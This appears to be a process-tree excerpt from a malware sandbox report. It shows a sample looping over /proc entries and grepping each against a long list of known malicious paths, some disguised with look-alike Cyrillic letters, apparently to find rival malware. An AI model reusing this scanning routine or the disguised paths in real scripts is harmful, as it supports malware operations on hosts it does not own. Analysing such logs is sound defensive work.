/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:870
-
-
/bin/grepgrep exe2⤵PID:873
-
-
/bin/lsls -latrh /proc/232⤵PID:872
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:875
-
-
/bin/grepgrep exe2⤵PID:878
-
-
/bin/lsls -latrh /proc/242⤵PID:877
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:880
-
-
/bin/grepgrep exe2⤵PID:883
-
-
/bin/lsls -latrh /proc/32⤵PID:882
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:885
-
-
/bin/grepgrep exe2⤵PID:888
-
-
/bin/lsls -latrh /proc/3202⤵PID:887
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:890
-
-
/bin/grepgrep exe2⤵PID:893
-
-
/bin/lsls -latrh /proc/3222⤵PID:892
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:895
-
-
/bin/grepgrep exe2⤵PID:898
-
-
/bin/lsls -latrh /proc/3242⤵PID:897
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:901
-
-
/bin/grepgrep exe2⤵PID:905
-
-
/bin/lsls -latrh /proc/3512⤵PID:904
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:907
-
-
/bin/grepgrep exe2⤵PID:911
-
-
/bin/lsls -latrh /proc/3532⤵PID:910
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:914
-
-
/bin/lsls -latrh /proc/362⤵PID:917
-
-
/bin/grepgrep exe2⤵PID:918
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:921
-
-
/bin/grepgrep exe2⤵PID:924
-
-
/bin/lsls -latrh /proc/372⤵PID:923
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:927
-
-
/bin/grepgrep exe2⤵PID:934
-
-
/bin/lsls -latrh /proc/3752⤵PID:933
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:936
-
-
/bin/grepgrep exe2⤵PID:940
-
-
/bin/lsls -latrh /proc/3772⤵PID:939
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:943
-
-
/bin/grepgrep exe2⤵PID:947
-
-
/bin/lsls -latrh /proc/3872⤵PID:946
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:950
-
-
/bin/grepgrep exe2⤵PID:953
-
-
/bin/lsls -latrh /proc/3992⤵PID:952
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:956
-
-
/bin/grepgrep exe2⤵PID:960
-
-
/bin/lsls -latrh /proc/42⤵PID:959
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:962
-
-
/bin/grepgrep exe2⤵PID:966
-
-
/bin/lsls -latrh /proc/4702⤵PID:965
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:969
-
-
/bin/grepgrep exe2⤵PID:973
-
-
/bin/lsls -latrh /proc/4772⤵PID:972
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:976
-
-
/bin/grepgrep exe2⤵PID:979
-
-
/bin/lsls -latrh /proc/52⤵PID:978
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:983
-
-
/bin/grepgrep exe2⤵PID:986
-
-
/bin/lsls -latrh /proc/5102⤵PID:985
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:989
-
-
/bin/grepgrep exe2⤵PID:993
-
-
/bin/lsls -latrh /proc/5142⤵PID:992
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:995
-
-
/bin/grepgrep exe2⤵PID:999
-
-
/bin/lsls -latrh /proc/62⤵PID:998
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1002
-
-
/bin/grepgrep exe2⤵PID:1005
-
-
/bin/lsls -latrh /proc/6842⤵PID:1004
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1008
-
-
/bin/grepgrep exe2⤵PID:1012
-
-
/bin/lsls -latrh /proc/692⤵PID:1011
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1015
-
-
/bin/grepgrep exe2⤵PID:1019
-
-
/bin/lsls -latrh /proc/6982⤵PID:1018
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1021
-
-
/bin/grepgrep exe2⤵PID:1024
-
-
/bin/lsls -latrh /proc/6992⤵PID:1023
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1027
-
-
/bin/grepgrep exe2⤵PID:1033
-
-
/bin/lsls -latrh /proc/72⤵PID:1032
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1035
-
-
/bin/grepgrep exe2⤵PID:1039
-
-
/bin/lsls -latrh /proc/702⤵PID:1038
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1043
-
-
/bin/grepgrep exe2⤵PID:1047
-
-
/bin/lsls -latrh /proc/7032⤵PID:1046
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1051
-
-
/bin/grepgrep exe2⤵PID:1054
-
-
/bin/lsls -latrh /proc/7042⤵PID:1053
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1057
-
-
/bin/grepgrep exe2⤵PID:1061
-
-
/bin/lsls -latrh /proc/7052⤵PID:1060
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1064
-
-
/bin/grepgrep exe2⤵PID:1068
-
-
/bin/lsls -latrh /proc/7062⤵PID:1067
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1071
-
-
/bin/grepgrep exe2⤵PID:1074
-
-
/bin/lsls -latrh /proc/712⤵PID:1073
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1077
-
-
/bin/grepgrep exe2⤵PID:1080
-
-
/bin/lsls -latrh /proc/7102⤵PID:1079
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1082
-
-
/bin/grepgrep exe2⤵PID:1085
-
-
/bin/lsls -latrh /proc/7162⤵PID:1084
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1088
-
-
/bin/grepgrep exe2⤵PID:1091
-
-
/bin/lsls -latrh /proc/732⤵PID:1090
-
-
